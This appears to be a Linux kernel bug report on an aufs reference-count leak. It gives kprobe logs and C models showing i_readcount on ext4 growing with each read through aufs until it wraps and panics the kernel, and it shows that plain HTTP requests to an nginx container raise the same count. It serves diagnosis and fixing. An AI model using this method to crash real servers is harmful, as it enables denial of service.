Problem Demonstration / Instrumentation:
---------------------------------------
This kprobe kernel module ("kmod-kprobe-fput.c") inserts a
probe on __fput() and prints the i_readcount value before
it is decremented, when a specified filename is found.
(Usage/steps are in its header comments.)
$ sudo insmod kmod-kprobe-fput.ko
[ 315.625113] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 0)
The i_readcount value is only incremented on reads, not writes:
$ touch test
[ 308.193058] file: test, fs type: ext4, inode readcount: 0
$ > test
[ 310.293847] file: test, fs type: ext4, inode readcount: 0
$ cat test
[ 312.667149] file: test, fs type: ext4, inode readcount: 1
$ cat test
[ 317.312413] file: test, fs type: ext4, inode readcount: 1
$ cat test
[ 319.223841] file: test, fs type: ext4, inode readcount: 1
It is decremented only when the file is closed:
$ tail -f test &
$ tail -f test &
$ tail -f test &
$ cat test
[ 365.042632] file: test, fs type: ext4, inode readcount: 4
$ kill %%
[ 372.241224] file: test, fs type: ext4, inode readcount: 3
$ kill %%
[ 376.151455] file: test, fs type: ext4, inode readcount: 2
$ kill %%
[ 378.802151] file: test, fs type: ext4, inode readcount: 1
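The ext4-only behaviour logged above can be mimicked with a small userspace model. This is only a sketch: `toy_inode`, `toy_open()` and `toy_fput()` are made-up names, and the userspace open flags stand in for the kernel's file mode bits. It assumes the count goes up on a read-only open and comes back down on the final close, with the probe reading the value just before the decrement.

```c
#include <assert.h>
#include <fcntl.h>   /* O_RDONLY, O_WRONLY, O_RDWR, O_ACCMODE */

/* Toy stand-in for the single inode field that matters here. */
struct toy_inode {
    int i_readcount;
};

/* Open: only a read-only open is counted (assumption of this model). */
static void toy_open(struct toy_inode *inode, int flags)
{
    if ((flags & O_ACCMODE) == O_RDONLY)
        inode->i_readcount++;
}

/*
 * Final close: return the value seen *before* the decrement, which is
 * what the probe on __fput() prints, then undo the open's increment.
 */
static int toy_fput(struct toy_inode *inode, int flags)
{
    int seen = inode->i_readcount;

    if ((flags & O_ACCMODE) == O_RDONLY) {
        /* Dropping a count that is already zero is a bug. */
        assert(inode->i_readcount != 0);
        inode->i_readcount--;
    }
    return seen;
}
```

In this model a write-only open/close pair reports 0, a lone read-only pair reports 1, and four concurrent read-only opens closed one after another report 4, 3, 2, 1, which matches the log lines above.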
With aufs, there are 2 files/inodes: one in the virtual/aufs
filesystem, another in the (underlying) real/ext4 filesystem.
aufs then handles/redirects the open/read/write calls to the latter.
$ mkdir dir mnt
$ touch dir/test
$ sudo mount -t aufs -o br=dir none mnt
$ ls mnt
test
The problem is observable right away: i_readcount for the real
inode/filesystem gets an extra increment on each read-only open.
$ cat mnt/test
[ 453.819165] file: test, fs type: aufs, inode readcount: 1
[ 453.819226] file: test, fs type: ext4, inode readcount: 2
$ cat mnt/test
[ 458.091550] file: test, fs type: aufs, inode readcount: 1
[ 458.091599] file: test, fs type: ext4, inode readcount: 3
$ cat mnt/test
[ 463.165711] file: test, fs type: aufs, inode readcount: 1
[ 463.165759] file: test, fs type: ext4, inode readcount: 4
Compare that with the non-aufs/ext4-only output above for
multiple cats ;-) - there the count stays at 1, while here the
inode's i_readcount on ext4 grows by one with every cat.
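Going only by the values logged above (2, 3, 4 on ext4), the imbalance can be sketched as two increments on the real inode per read-only open through aufs, against a single decrement at close. That split is an inference from the log, not taken from the aufs source, and `toy_inode` / `toy_cat_via_aufs()` are hypothetical names.

```c
/* Toy stand-in for the real (ext4) inode's read counter. */
struct toy_inode {
    int i_readcount;
};

/*
 * One "cat mnt/test": read-only open plus close through the aufs mount.
 * Returns the value the probe would print for the real inode, i.e. the
 * count right before the decrement in __fput().
 */
static int toy_cat_via_aufs(struct toy_inode *real)
{
    int seen;

    real->i_readcount += 2;   /* assumed: the open is counted twice */
    seen = real->i_readcount; /* value printed by the probe */
    real->i_readcount -= 1;   /* the single decrement at close */
    return seen;
}
```

Every call leaves the counter one higher than before, so after N such opens the real inode still holds N counts with no file open at all.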
...
That kprobe was enabled during the 'Exploit / Local' run.
The logs show the i_readcount value incrementing until it
overflowed and wrapped back to 0, at which point the BUG_ON()
triggered and the kernel panicked.
(With the 'multiple' parameter set, the module only prints when
i_readcount, taken as an unsigned value, is a multiple of it.)
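For reference, a guess at how such a print filter might look. The function name `should_print()` and the 64-bit unsigned width are assumptions; the width is picked because it is consistent with the negative values in the log below ending in ...51616 (2^64 modulo 100000 is 51616), and the "0 means print always" case follows the 'multiple: 0' runs above.

```c
#include <stdbool.h>
#include <stdint.h>

/*
 * Hypothetical filter: print when the counter, converted to a 64-bit
 * unsigned value, is a multiple of `multiple`. A `multiple` of 0
 * disables the filter (every __fput() on the file is printed).
 */
static bool should_print(int readcount, uint64_t multiple)
{
    if (multiple == 0)
        return true;

    /* A negative int converts to 2^64 + readcount (well defined in C). */
    return (uint64_t)readcount % multiple == 0;
}
```

With multiple=100000 this accepts 100000, 2147400000, -2147451616, -51616 and 0, which are all values seen in the log, and rejects for example -50000.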
$ sudo insmod kmod-kprobe-fput.ko multiple=100000
[ 1684.953480] kmod_kprobe_fput: kprobe registered (filename: test, multiple: 100000)
$ cd mnt && /tmp/exploit
[ 1799.795277] file: test, fs type: ext4, inode readcount: 100000
[ 1800.420418] file: test, fs type: ext4, inode readcount: 200000
[ 1801.030687] file: test, fs type: ext4, inode readcount: 300000
...
[ 2428.610831] file: test, fs type: ext4, inode readcount: 100000000
...
[ 7909.385033] file: test, fs type: ext4, inode readcount: 1000000000
...
[14191.533372] file: test, fs type: ext4, inode readcount: 2000000000
...
[15156.688678] file: test, fs type: ext4, inode readcount: 2147400000
[15157.432852] file: test, fs type: ext4, inode readcount: -2147451616
...
[16123.045186] file: test, fs type: ext4, inode readcount: -2000051616
...
[22655.214420] file: test, fs type: ext4, inode readcount: -1000051616
...
[28517.303066] file: test, fs type: ext4, inode readcount: -100051616
...
[29161.058111] file: test, fs type: ext4, inode readcount: -1051616
[29161.702771] file: test, fs type: ext4, inode readcount: -951616
[29162.337571] file: test, fs type: ext4, inode readcount: -851616
[29162.980385] file: test, fs type: ext4, inode readcount: -751616
[29163.614763] file: test, fs type: ext4, inode readcount: -651616
[29164.253970] file: test, fs type: ext4, inode readcount: -551616
[29164.890793] file: test, fs type: ext4, inode readcount: -451616
[29165.566457] file: test, fs type: ext4, inode readcount: -351616
[29166.224213] file: test, fs type: ext4, inode readcount: -251616
[29166.879175] file: test, fs type: ext4, inode readcount: -151616
[29167.528966] file: test, fs type: ext4, inode readcount: -51616
[29167.862871] file: test, fs type: ext4, inode readcount: 0
[29167.864633] ------------[ cut here ]------------
[29167.866016] kernel BUG at include/linux/fs.h:2963!
[29167.867423] invalid opcode: 0000 [#1] SMP PTI
[29167.868584] CPU: 0 PID: 5314 Comm: exploit Tainted: G OE 5.4.0-21-generic #25-Ubuntu
[29167.870751] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
[29167.873202] RIP: 0010:__fput+0x25d/0x260
...
[29167.901583] Call Trace:
[29167.902387] ____fput+0xe/0x10
[29167.903344] task_work_run+0x8f/0xb0
[29167.904420] exit_to_usermode_loop+0x131/0x160
[29167.905749] do_syscall_64+0x163/0x190
[29167.906929] entry_SYSCALL_64_after_hwframe+0x44/0xa9
...
[29167.967808] Kernel panic - not syncing: Fatal exception
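The sign flip and the final 0 in the log above are plain 32-bit wrap-around. A minimal sketch, assuming the counter behaves as a 32-bit two's-complement integer starting from zero (`counter_after()` is a hypothetical helper, not kernel code):

```c
#include <stdint.h>

/*
 * Value of a 32-bit two's-complement counter after `net` net
 * increments starting from zero.
 */
static int32_t counter_after(uint64_t net)
{
    uint32_t low = (uint32_t)net;   /* only the low 32 bits survive */

    if (low <= INT32_MAX)
        return (int32_t)low;

    /* Upper half of the range maps to negative values. */
    return (int32_t)((int64_t)low - 4294967296LL);
}
```

One step past 2147483647 gives -2147483648, 2147515680 net increments give the first negative value logged (-2147451616), and after 4294967296 (2^32) net increments the counter reads 0 again. That fits the last 'inode readcount: 0' line, which is immediately followed by the BUG in __fput().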
Example of Web Server / nginx with Kubernetes
---------------------------------------------
The same i_readcount increments are observed for the
'index.html' page served by nginx, as that is stored
in the container image, thus accessed via aufs.
(After deploying Kubernetes/Docker with the aufs storage driver.)
Start nginx pod/container:
$ kubectl run web-server --image=nginx
Get its IP address:
$ kubectl get pods -o wide
NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES
web-server 1/1 Running 0 48s 10.10.0.4 sf244755-focal <none> <none>
Test it:
$ curl -s 10.10.0.4 | grep title
<title>Welcome to nginx!</title>
$ sudo insmod kmod-kprobe-fput.ko filename=index.html
[ 3735.601633] kmod_kprobe_fput: kprobe registered (filename: index.html, multiple: 0)
$ curl -s 10.10.0.4 >/dev/null
[ 3757.368671] file: index.html, fs type: aufs, inode readcount: 1
[ 3757.381055] file: index.html, fs type: ext4, inode readcount: 7
$ curl -s 10.10.0.4 >/dev/null
[ 3767.402218] file: index.html, fs type: aufs, inode readcount: 1
[ 3767.407846] file: index.html, fs type: ext4, inode readcount: 8
$ curl -s 10.10.0.4 >/dev/null
[ 3771.856605] file: index.html, fs type: aufs, inode readcount: 1
[ 3771.866484] file: index.html, fs type: ext4, inode readcount: 9
And the web server can be exposed/made available externally,
for example:
$ kubectl expose pod web-server --port 80 --type NodePort
$ kubectl get services web-server
NAME TYPE CLUSTER-IP EXTERNAL-IP PORT(S) AGE
web-server NodePort 10.100.0.69 <none> 80:32089/TCP 6s
another-host$ curl -s 192.168.122.151:32089 | grep title
<title>Welcome to nginx!</title>
[ 4037.893050] file: index.html, fs type: aufs, inode readcount: 1
[ 4037.909541] file: index.html, fs type: ext4, inode readcount: 10